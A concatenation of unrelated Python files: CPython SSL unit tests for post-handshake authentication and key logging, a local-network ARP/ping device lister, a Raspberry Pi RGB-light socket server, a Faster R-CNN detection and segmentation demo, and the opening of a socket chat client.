server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_optional_nocert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_OPTIONAL
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
# optional doesn't fail when client does not have a cert
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
def test_pha_no_pha_client(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(ssl.SSLError, 'not server'):
s.verify_client_post_handshake()
s.write(b'PHA')
self.assertIn(b'extension not received', s.recv(1024))
def test_pha_no_pha_server(self):
# server doesn't have PHA enabled, cert is requested in handshake
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA doesn't fail if there is already a cert
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_not_tls13(self):
# TLS 1.2
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# PHA fails for TLS != 1.3
s.write(b'PHA')
self.assertIn(b'WRONG_SSL_VERSION', s.recv(1024))
def test_bpo37428_pha_cert_none(self):
# verify that post_handshake_auth does not implicitly enable cert
# validation.
hostname = SIGNED_CERTFILE_HOSTNAME
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# no cert validation and CA on client side
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
server_context.load_verify_locations(SIGNING_CA)
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# server cert has not been validated
self.assertEqual(s.getpeercert(), {})
HAS_KEYLOG = hasattr(ssl.SSLContext, 'keylog_filename')
requires_keylog = unittest.skipUnless(
HAS_KEYLOG, 'test requires OpenSSL 1.1.1 with keylog callback')
class TestSSLDebug(unittest.TestCase):
def keylog_lines(self, fname=support.TESTFN):
with open(fname) as f:
return len(list(f))
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_defaults(self):
self.addCleanup(support.unlink, support.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
self.assertFalse(os.path.isfile(support.TESTFN))
ctx.keylog_filename = support.TESTFN
self.assertEqual(ctx.keylog_filename, support.TESTFN)
self.assertTrue(os.path.isfile(support.TESTFN))
self.assertEqual(self.keylog_lines(), 1)
ctx.keylog_filename = None
self.assertEqual(ctx.keylog_filename, None)
with self.assertRaises((IsADirectoryError, PermissionError)):
# Windows raises PermissionError
ctx.keylog_filename = os.path.dirname(
os.path.abspath(support.TESTFN))
with self.assertRaises(TypeError):
ctx.keylog_filename = 1
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_filename(self):
self.addCleanup(support.unlink, support.TESTFN)
client_context, server_context, hostname = testing_context()
client_context.keylog_filename = support.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# header, 5 lines for TLS 1.3
self.assertEqual(self.keylog_lines(), 6)
client_context.keylog_filename = None
server_context.keylog_filename = support.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 11)
client_context.keylog_filename = support.TESTFN
server_context.keylog_filename = support.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 21)
client_context.keylog_filename = None
server_context.keylog_filename = None
@requires_keylog
@unittest.skipIf(sys.flags.ignore_environment,
"test is not compatible with ignore_environment")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_env(self):
self.addCleanup(support.unlink, support.TESTFN)
with unittest.mock.patch.dict(os.environ):
os.environ['SSLKEYLOGFILE'] = support.TESTFN
self.assertEqual(os.environ['SSLKEYLOGFILE'], support.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
ctx = ssl.create_default_context()
self.assertEqual(ctx.keylog_filename, support.TESTFN)
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.keylog_filename, support.TESTFN)
def test_msg_callback(self):
client_context, server_context, hostname = testing_context()
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
self.assertIs(client_context._msg_callback, None)
client_context._msg_callback = msg_cb
self.assertIs(client_context._msg_callback, msg_cb)
with self.assertRaises(TypeError):
client_context._msg_callback = object()
def test_msg_callback_tls12(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_TLSv1_3
msg = []
def msg_cb(conn, direction, version, content_type, msg_type, data):
self.assertIsInstance(conn, ssl.SSLSocket)
self.assertIsInstance(data, bytes)
self.assertIn(direction, {'read', 'write'})
msg.append((direction, version, content_type, msg_type))
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.SERVER_KEY_EXCHANGE),
msg
)
self.assertIn(
("write", TLSVersion.TLSv1_2, _TLSContentType.CHANGE_CIPHER_SPEC,
_TLSMessageType.CHANGE_CIPHER_SPEC),
msg
)
def test_main(verbose=False):
if support.verbose:
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
TestPostHandshakeAuth, TestSSLDebug
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
main.py
|
#!/usr/bin/python3
import os
import sys
import subprocess
import threading
from termcolor import colored
import pyfiglet
ascii_banner = pyfiglet.figlet_format("PYSCAN")
print(colored(ascii_banner, 'green'))
def getStringFromBraces(string):
return string.replace('(', '').replace(')','')
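# Pretty-prints one arp entry as "hostname [ ip ]" using termcolor.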
def drawHost(hostString):
args = hostString.split(" ")
print(colored(getStringFromBraces(args[0]), 'red'), colored('[', 'blue'), colored(getStringFromBraces(args[1]), 'green'), colored(']', 'blue'))
print("Starting arp scan...", end='\r')
arpResult = subprocess.run(['arp', '-a'], stdout=subprocess.PIPE).stdout.decode('utf-8')
print("Finished arp scan...", end='\r')
ips = list(map(lambda e: e.split(")")[0], arpResult.split("(")))[1::]
connections = arpResult.split("\n")
hosts = list(map(lambda e: e.split(" ")[0].replace('?', 'unknown')+' '+getStringFromBraces(e.split(" ")[1]), arpResult.split("\n")[:-1:] ))
reachable_ips = []
not_reachable_ips = []
ips_checked = 0
reachable_hosts = []
def progressBar(current, total, barLength = 20):
percent = float(current) * 100 / total
arrow = '-' * int(percent/100 * barLength - 1) + '>'
spaces = ' ' * (barLength - len(arrow))
finished = ''
ending = ''
if percent == 100:
ending = '\n'
finished = 'finished!'
sys.stdout.write(f'\rProgress: [%s%s] %d %% [{current}/{total}] {finished}{ending}' % (arrow, spaces, percent))
sys.stdout.flush()
progressBar(ips_checked, len(ips))
def check_reachable_ips(ip, number):
global reachable_ips, not_reachable_ips, ips_checked, ips
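# Treat the host as reachable unless ping exits with return code 2 (detected via the CompletedProcess repr); inspecting .returncode directly would be more robust.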
HOST_UP = not 'returncode=2' in str(subprocess.run(['ping', '-c', '1', ip], stdout=subprocess.PIPE))
if HOST_UP:
reachable_ips.append(ip)
reachable_hosts.append(number)
else:
not_reachable_ips.append(ip)
ips_checked += 1
progressBar(ips_checked, len(ips))
def ipList(hostIndexes):
if len(hostIndexes) == 0:
print('No devices found')
return
# only draw the hosts that answered the ping scan
for index in hostIndexes:
drawHost(hosts[index])
try:
for i, ip in enumerate(ips):
x = threading.Thread(target=check_reachable_ips, args=(ip, i))
x.start()
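# Busy-wait until every worker thread has incremented ips_checked; joining the threads would avoid spinning the CPU here.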
while ips_checked != len(ips):
pass
except KeyboardInterrupt:
print(colored('[-]', 'red'), 'Stopping scan...')
sys.exit()
print(f'\nDevices found on your network ({len(reachable_ips)} of {ips_checked}):')
ipList(reachable_hosts)
sys.stdout.flush()
|
rgb_server.py
|
#!/usr/bin/env python3
# gets rgb value from client and sets lights accordingly
import socket
import logging
import os
import time
import multiprocessing
import copy
from rgb import RGB
#configs:
HOST = '192.168.1.69' # change this value to match the IP address of your Pi
PORT = 65432 # you may need to change this if this port is already in use
# receives message from client. Return list of bytes
def getMessage():
data = conn.recv(8) # getting junk byte (see client file for more information)
data = conn.recv(1024)
data_list = []
for byte in data:
data_list.append(byte)
log(f"Input from client: {data_list}")
return data_list
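# Message layout (inferred from the dispatch below): byte 0 is an opcode (0=solid color, 1=gradient, 2=color fade, 3=color bands, 4=brightness, 5=toggle on/off, 6=status query); the remaining bytes are effect parameters.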
# takes a string input. Prints string + current time in order to log the event
def log(message):
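# Note: on Linux, TZ expects an IANA zone name such as "America/New_York" (plus time.tzset() to be safe); a Windows-style name like the one below may be ignored.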
os.environ['TZ'] = "Eastern Standard Time"
current_time = time.strftime("%H:%M:%S")
print(f"[{current_time}] {message}")
# main:
if __name__ == "__main__":
# creating light object
strip = RGB()
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
try:
s.bind((HOST, PORT))
light_process = None
copy_process = None
lights_on = True
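# light_process runs the current effect, copy_process keeps a restartable copy of it, and lights_on tracks the on/off toggle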
# server loop
while True:
log("Looking for connection")
s.listen()
conn, addr = s.accept()
with conn:
log("Client connected")
# connection loop
while True:
try:
# taking input
input = getMessage()
# freeing microprocess if applicable
if light_process != None and input[0] != 4 and input[0] != 6 and lights_on:
light_process.terminate()
light_process.join()
log(light_process)
# interpreting input and assigning process
if input[0] == 0:
log("Setting strip to solid color")
light_process = multiprocessing.Process(target=strip.set_color, args=(input[1:-2], input[-2], input[-1]))
elif input[0] == 1:
log("Setting gradient")
light_process = multiprocessing.Process(target=strip.set_gradient, args=(input[1:4], input[4:-4], input[-4], input[-3], input[-2], input[-1]))
elif input[0] == 2:
log("Setting color fade")
light_process = multiprocessing.Process(target=strip.set_color_fade, args=(input[1:-1], input[-1]))
elif input[0] == 3:
log("Setting color bands")
light_process = multiprocessing.Process(target=strip.set_color_band, args=(input[1:-4], input[-4], input[-3], input[-2], input[-1]))
elif input[0] == 4:
log("changing brightness")
# Until multiprocessing.BaseManager is wired up, the running process's brightness is not touched directly: a copy of the process is kept, the brightness is changed, and the effect is restarted from that copy.
# This is dirty, but BaseManager is confusing.
if lights_on:
if light_process != None:
light_process.terminate()
light_process.join()
if copy_process != None:
light_process = copy.copy(copy_process)
strip.set_brightness(input[1])
elif input[0] == 5:
log(f"Lights on: {not lights_on}")
# if the lights are on, stop the current effect and blank the strip; toggling back on restarts the saved effect below
if lights_on:
if light_process != None:
light_process.terminate()
light_process.join()
if copy_process != None:
light_process = copy.copy(copy_process)
strip.set_color([0, 0, 0])
lights_on = not lights_on
elif input[0] == 6:
log("sending status to client")
if lights_on:
int_val = 1
conn.send(int_val.to_bytes(2, "big"))
else:
int_val = 0
conn.send(int_val.to_bytes(2, "big"))
# starting process
if light_process != None and lights_on and input[0] != 6:
copy_process = copy.copy(light_process)
light_process.start()
except ConnectionResetError as e:
if e.errno == 104:
log("Client has disconnected")
else:
logging.exception("connection_loop:")
break
except Exception:
logging.exception("connection_loop:")
break
except Exception:
logging.exception("server_loop:")
except KeyboardInterrupt:
log("Shutting down server")
|
demo_multi_thread.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# --------------------------------------------------------
# Tensorflow Faster R-CNN
# Licensed under The MIT License [see LICENSE for details]
# Written by Jiasen Lu, Jianwei Yang, based on code from Ross Girshick
# --------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from threading import Thread
import _init_paths
import os
import sys
import numpy as np
import argparse
import pprint
import pdb
import time
import cv2
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.optim as optim
import torchvision.transforms as transforms
import torchvision.datasets as dset
from scipy.misc import imread, imresize
from roi_data_layer.roidb import combined_roidb
from roi_data_layer.roibatchLoader import roibatchLoader
from model.utils.config import cfg, cfg_from_file, cfg_from_list, get_output_dir
from model.rpn.bbox_transform import clip_boxes
from model.nms.nms_wrapper import nms
from model.rpn.bbox_transform import bbox_transform_inv
from model.utils.net_utils import save_net, load_net, vis_detections, vis_kiktech_detections
from model.utils.blob import im_list_to_blob
from model.faster_rcnn.vgg16 import vgg16
from model.faster_rcnn.resnet import resnet
from model.faster_rcnn.mobilenet import mobilenet
from model.faster_rcnn.shufflenet import shufflenet
from scipy import misc
import Metrics
try:
xrange # Python 2
except NameError:
xrange = range # Python 3
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Train a Fast R-CNN network')
parser.add_argument('--dataset', dest='dataset',
help='training dataset',
default='pascal_voc', type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file',
default='cfgs/vgg16.yml', type=str)
parser.add_argument('--net', dest='net',
help='vgg16, res50, res101, res152',
default='res101', type=str)
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
parser.add_argument('--load_dir', dest='load_dir',
help='directory to load models',
default="/srv/share/jyang375/models")
parser.add_argument('--image_dir', dest='image_dir',
help='directory to load images for demo',
default="images")
parser.add_argument('--cuda', dest='cuda',
help='whether use CUDA',
action='store_true')
parser.add_argument('--mGPUs', dest='mGPUs',
help='whether use multiple GPUs',
action='store_true')
parser.add_argument('--cag', dest='class_agnostic',
help='whether perform class_agnostic bbox regression',
action='store_true')
parser.add_argument('--parallel_type', dest='parallel_type',
help='which part of model to parallel, 0: all, 1: model before roi pooling',
default=0, type=int)
parser.add_argument('--checksession', dest='checksession',
help='checksession to load model',
default=1, type=int)
parser.add_argument('--checkepoch', dest='checkepoch',
help='checkepoch to load network',
default=1, type=int)
parser.add_argument('--checkpoint', dest='checkpoint',
help='checkpoint to load network',
default=10021, type=int)
parser.add_argument('--bs', dest='batch_size',
help='batch_size',
default=1, type=int)
parser.add_argument('--vis', dest='vis',
help='visualization mode',
action='store_true')
parser.add_argument('--webcam_num', dest='webcam_num',
help='webcam ID number',
default=-1, type=int)
# Start add by Minming: include the ground truth (gt) in the visualization
parser.add_argument('--data_path', dest='data_path',
help='the ground truth of the data set',
default="./data/kiktech/kiktech2018joint10", )
# End add
args = parser.parse_args()
return args
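# Illustrative invocation (not part of the original script): the checkpoint must
# actually exist at <load_dir>/<net>/<dataset>/faster_rcnn_<session>_<epoch>_<checkpoint>.pth,
# which is how load_name is assembled below.
#
#   python demo_multi_thread.py --net res101 --dataset pascal_voc --cuda \
#       --load_dir models --image_dir images \
#       --checksession 1 --checkepoch 1 --checkpoint 10021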
lr = cfg.TRAIN.LEARNING_RATE
momentum = cfg.TRAIN.MOMENTUM
weight_decay = cfg.TRAIN.WEIGHT_DECAY
def _get_image_blob(im):
"""Converts an image into a network input.
Arguments:
im (ndarray): a color image in BGR order
Returns:
blob (ndarray): a data blob holding an image pyramid
im_scale_factors (list): list of image scales (relative to im) used
in the image pyramid
"""
im_orig = im.astype(np.float32, copy=True)
im_orig -= cfg.PIXEL_MEANS
im_shape = im_orig.shape
im_size_min = np.min(im_shape[0:2])
im_size_max = np.max(im_shape[0:2])
processed_ims = []
im_scale_factors = []
for target_size in cfg.TEST.SCALES:
im_scale = float(target_size) / float(im_size_min)
# Prevent the biggest axis from being more than MAX_SIZE
if np.round(im_scale * im_size_max) > cfg.TEST.MAX_SIZE:
im_scale = float(cfg.TEST.MAX_SIZE) / float(im_size_max)
im = cv2.resize(im_orig, None, None, fx=im_scale, fy=im_scale,
interpolation=cv2.INTER_LINEAR)
im_scale_factors.append(im_scale)
processed_ims.append(im)
# Create a blob to hold the input images
blob = im_list_to_blob(processed_ims)
return blob, np.array(im_scale_factors)
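# Worked example of the scaling in _get_image_blob, assuming the common Faster R-CNN
# defaults cfg.TEST.SCALES = (600,) and cfg.TEST.MAX_SIZE = 1000 (the loaded cfg file
# may override these): for a 375x500 input, im_scale = 600 / 375 = 1.6 and
# round(1.6 * 500) = 800 <= 1000, so the blob holds a single 600x800 image and
# im_scale_factors == [1.6].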
if __name__ == '__main__':
args = parse_args()
print('Called with args:')
print(args)
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.USE_GPU_NMS = args.cuda
print('Using config:')
pprint.pprint(cfg)
np.random.seed(cfg.RNG_SEED)
# train set
# -- Note: use the validation set and disable flipping to enable faster loading.
input_dir = args.load_dir + "/" + args.net + "/" + args.dataset
if not os.path.exists(input_dir):
raise Exception('There is no input directory for loading network from ' + input_dir)
load_name = os.path.join(input_dir,
'faster_rcnn_{}_{}_{}.pth'.format(args.checksession, args.checkepoch, args.checkpoint))
pascal_classes = np.asarray(['__background__',
'person'
])
# Override with the full 20-class PASCAL VOC label set (replaces the person-only list above)
pascal_classes = ('__background__', # always index 0
'aeroplane', 'bicycle', 'bird', 'boat',
'bottle', 'bus', 'car', 'cat', 'chair',
'cow', 'diningtable', 'dog', 'horse',
'motorbike', 'person', 'pottedplant',
'sheep', 'sofa', 'train', 'tvmonitor')
# initialize the network here.
if args.net == 'vgg16':
fasterRCNN = vgg16(pascal_classes, pretrained=False, class_agnostic=args.class_agnostic)
elif args.net == 'res101':
fasterRCNN = resnet(pascal_classes, 101, pretrained=False, class_agnostic=args.class_agnostic)
elif args.net == 'res50':
fasterRCNN = resnet(pascal_classes, 50, pretrained=False, class_agnostic=args.class_agnostic)
elif args.net == 'res152':
fasterRCNN = resnet(pascal_classes, 152, pretrained=False, class_agnostic=args.class_agnostic)
elif args.net == 'mobilenet':
fasterRCNN = mobilenet(pascal_classes, pretrained=False, class_agnostic=args.class_agnostic)
elif args.net == 'shufflenet':
fasterRCNN = shufflenet(pascal_classes, pretrained=False, class_agnostic=args.class_agnostic)
else:
print("network is not defined")
pdb.set_trace()
fasterRCNN.create_architecture()
print("load checkpoint %s" % (load_name))
if args.cuda > 0:
checkpoint = torch.load(load_name)
else:
checkpoint = torch.load(load_name, map_location=(lambda storage, loc: storage))
fasterRCNN.load_state_dict(checkpoint['model'])
if 'pooling_mode' in checkpoint.keys():
cfg.POOLING_MODE = checkpoint['pooling_mode']
print('load model successfully!')
# pdb.set_trace()
print("load checkpoint %s" % (load_name))
# initialize the tensor holders here.
im_data = torch.FloatTensor(1)
im_info = torch.FloatTensor(1)
num_boxes = torch.LongTensor(1)
gt_boxes = torch.FloatTensor(1)
dl_data = torch.LongTensor(1)
# ship to cuda
if args.cuda > 0:
im_data = im_data.cuda()
im_info = im_info.cuda()
num_boxes = num_boxes.cuda()
gt_boxes = gt_boxes.cuda()
dl_data = dl_data.cuda()
# make variable
im_data = Variable(im_data, volatile=True)
im_info = Variable(im_info, volatile=True)
num_boxes = Variable(num_boxes, volatile=True)
gt_boxes = Variable(gt_boxes, volatile=True)
dl_data = Variable(dl_data, volatile=True)
if args.cuda > 0:
cfg.CUDA = True
if args.cuda > 0:
fasterRCNN.cuda()
fasterRCNN.eval()
start = time.time()
max_per_image = 100
thresh = 0.05
vis = True
webcam_num = args.webcam_num
# Set up webcam or get image directories
if webcam_num >= 0:
cap = cv2.VideoCapture(webcam_num)
num_images = 0
else:
imglist = os.listdir(args.image_dir)
num_images = len(imglist)
print('Loaded Photo: {} images.'.format(num_images))
all_time = 0
while (num_images >= 0):
total_tic = time.time()
if webcam_num == -1:
num_images -= 1
# Get image from the webcam
if webcam_num >= 0:
if not cap.isOpened():
raise RuntimeError("Webcam could not open. Please check connection.")
ret, frame = cap.read()
im_in = np.array(frame)
# Load the demo image
else:
im_file = os.path.join(args.image_dir, imglist[num_images])
# im = cv2.imread(im_file)
im_in = np.array(imread(im_file))
if len(im_in.shape) == 2:
im_in = im_in[:, :, np.newaxis]
im_in = np.concatenate((im_in, im_in, im_in), axis=2)
# rgb -> bgr
im = im_in[:, :, ::-1]
# print(im.shape)
blobs, im_scales = _get_image_blob(im)
assert len(im_scales) == 1, "Only single-image batch implemented"
im_blob = blobs
im_info_np = np.array([[im_blob.shape[1], im_blob.shape[2], im_scales[0]]], dtype=np.float32)
im_data_pt = torch.from_numpy(im_blob)
im_data_pt = im_data_pt.permute(0, 3, 1, 2)
im_info_pt = torch.from_numpy(im_info_np)
im_data.data.resize_(im_data_pt.size()).copy_(im_data_pt)
im_info.data.resize_(im_info_pt.size()).copy_(im_info_pt)
gt_boxes.data.resize_(1, 1, 5).zero_()
num_boxes.data.resize_(1).zero_()
# dl_data.data.resize_(im_data_pt.size()).copy_(im_data_pt)
dl_data.data.resize_(im_data_pt.size()).zero_()
# pdb.set_trace()
# Mod: by Jie, add evaluation of segmentation
rois, cls_prob, bbox_pred, \
rpn_loss_cls, rpn_loss_box, \
RCNN_loss_cls, RCNN_loss_bbox, \
rois_label, drive_line, drive_line_loss = fasterRCNN(im_data, im_info, gt_boxes, num_boxes, dl_data)
def vis_drive_line(im, drive_line):
# print('drive_line.shape', drive_line.shape)
im2show = np.copy(im)
y_pred = drive_line.cpu().data.numpy()
_idx = 0
bs, c, h, w = drive_line.shape
y_pred_flag = np.argmax(y_pred[_idx,], axis=0) # one-hot: (C, H, W)--> label: (H, W)
hs, ws, cs = im.shape
y_pred_flag = y_pred_flag.astype(np.uint8)  # cast to uint8 before imresize so the label values are not rescaled by interpolation
y_pred_flag = imresize(y_pred_flag, (hs, ws), interp='nearest')
# find pred index
pred_idx = np.where(y_pred_flag == 1)
# color order is BGR
mask_result = np.zeros((hs, ws, 3), dtype=np.uint8)
mask_result[pred_idx[0], pred_idx[1], :] = 0, 255, 0  # highlight predicted drive-line pixels in green
# End mod
im2show = cv2.addWeighted(im2show, 1, mask_result, 0.4, 0)
result_path = os.path.join(args.image_dir, imglist[num_images][:-4] + "_seg.jpg")
cv2.imwrite(result_path, im2show)
def vis_bbox(im, rois, bbox_pred):
scores = cls_prob.data
boxes = rois.data[:, :, 1:5]
if cfg.TEST.BBOX_REG:
# Apply bounding-box regression deltas
box_deltas = bbox_pred.data
if cfg.TRAIN.BBOX_NORMALIZE_TARGETS_PRECOMPUTED:
# Optionally normalize targets by a precomputed mean and stdev
if args.class_agnostic:
if args.cuda > 0:
box_deltas = box_deltas.view(-1, 4) * torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_STDS).cuda() \
+ torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_MEANS).cuda()
else:
box_deltas = box_deltas.view(-1, 4) * torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_STDS) \
+ torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_MEANS)
box_deltas = box_deltas.view(1, -1, 4)
else:
if args.cuda > 0:
box_deltas = box_deltas.view(-1, 4) * torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_STDS).cuda() \
+ torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_MEANS).cuda()
else:
box_deltas = box_deltas.view(-1, 4) * torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_STDS) \
+ torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_MEANS)
box_deltas = box_deltas.view(1, -1, 4 * len(pascal_classes))
pred_boxes = bbox_transform_inv(boxes, box_deltas, 1)
pred_boxes = clip_boxes(pred_boxes, im_info.data, 1)
else:
# Simply repeat the boxes, once for each class
pred_boxes = np.tile(boxes, (1, scores.shape[1]))
pred_boxes /= im_scales[0]
scores = scores.squeeze()
pred_boxes = pred_boxes.squeeze()
det_toc = time.time()
detect_time = det_toc - det_tic
misc_tic = time.time()
if vis:
im2show = np.copy(im)
for j in xrange(1, len(pascal_classes)):
inds = torch.nonzero(scores[:, j] > thresh).view(-1)
# if there are detections for this class
if inds.numel() > 0:
cls_scores = scores[:, j][inds]
_, order = torch.sort(cls_scores, 0, True)
if args.class_agnostic:
cls_boxes = pred_boxes[inds, :]
else:
cls_boxes = pred_boxes[inds][:, j * 4:(j + 1) * 4]
cls_dets = torch.cat((cls_boxes, cls_scores.unsqueeze(1)), 1)
# cls_dets = torch.cat((cls_boxes, cls_scores), 1)
cls_dets = cls_dets[order]
keep = nms(cls_dets, cfg.TEST.NMS, force_cpu=not cfg.USE_GPU_NMS)
cls_dets = cls_dets[keep.view(-1).long()]
# draw this class's detections onto the image
if vis:
data_path = args.data_path
im2show = vis_kiktech_detections(im2show, pascal_classes[j], cls_dets.cpu().numpy(),
data_path, im_file, 0.5)
result_path = os.path.join(args.image_dir, imglist[num_images][:-4] + "_det.jpg")
cv2.imwrite(result_path, im2show)
return
total_tic = time.time()
det_tic = time.time()
det_t = Thread(target=vis_bbox, args=(im, rois, bbox_pred))
det_t.start()
det_toc = time.time()
detect_time = det_toc - det_tic
seg_tic = time.time()
seg_t = Thread(target=vis_drive_line, args=(im, drive_line))
seg_t.start()
seg_toc = time.time()
seg_time = seg_toc - seg_tic
# wait for both visualization threads to finish before computing total time
det_t.join()
seg_t.join()
total_toc = time.time()
total_time = total_toc - total_tic
if webcam_num == -1:
print('im_detect: {:d}/{:d} det_vis: {:.3f}s seg_vis: {:.3f}s total: {:.3f}s \r' \
.format(num_images + 1, len(imglist), detect_time, seg_time ,total_time))
if vis and (webcam_num == -1):
# result_path = os.path.join(args.image_dir, imglist[num_images][:-4] + "_det.jpg")
# cv2.imwrite(result_path, im2show_det)
#
# result_path = os.path.join(args.image_dir, imglist[num_images][:-4] + "_seg.jpg")
# cv2.imwrite(result_path, im2show_seg)
pass
else:
im2showRGB = cv2.cvtColor(im2show, cv2.COLOR_BGR2RGB)
cv2.imshow("frame", im2showRGB)
total_toc = time.time()
total_time = total_toc - total_tic
frame_rate = 1 / total_time
print('Frame rate:', frame_rate)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
all_time += total_time
print('total_time: {:.3f}s'.format(all_time))
if webcam_num >= 0:
cap.release()
cv2.destroyAllWindows()
|
client.py
|
from utils import sha256
import threading
import argparse
import socket
import json
class Client:
def __init__(self, ip: str, port: int, username: str, password: str):
self.__ip = ip
self.__port = port
self.alive = False
self.username = username
self.password = sha256(password)
@property
def ip(self) -> str:
return self.__ip
@property
def port(self) -> int:
return self.__port
def __enter__(self):
self.__socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.__socket.connect((self.ip, self.port))
return self.__socket
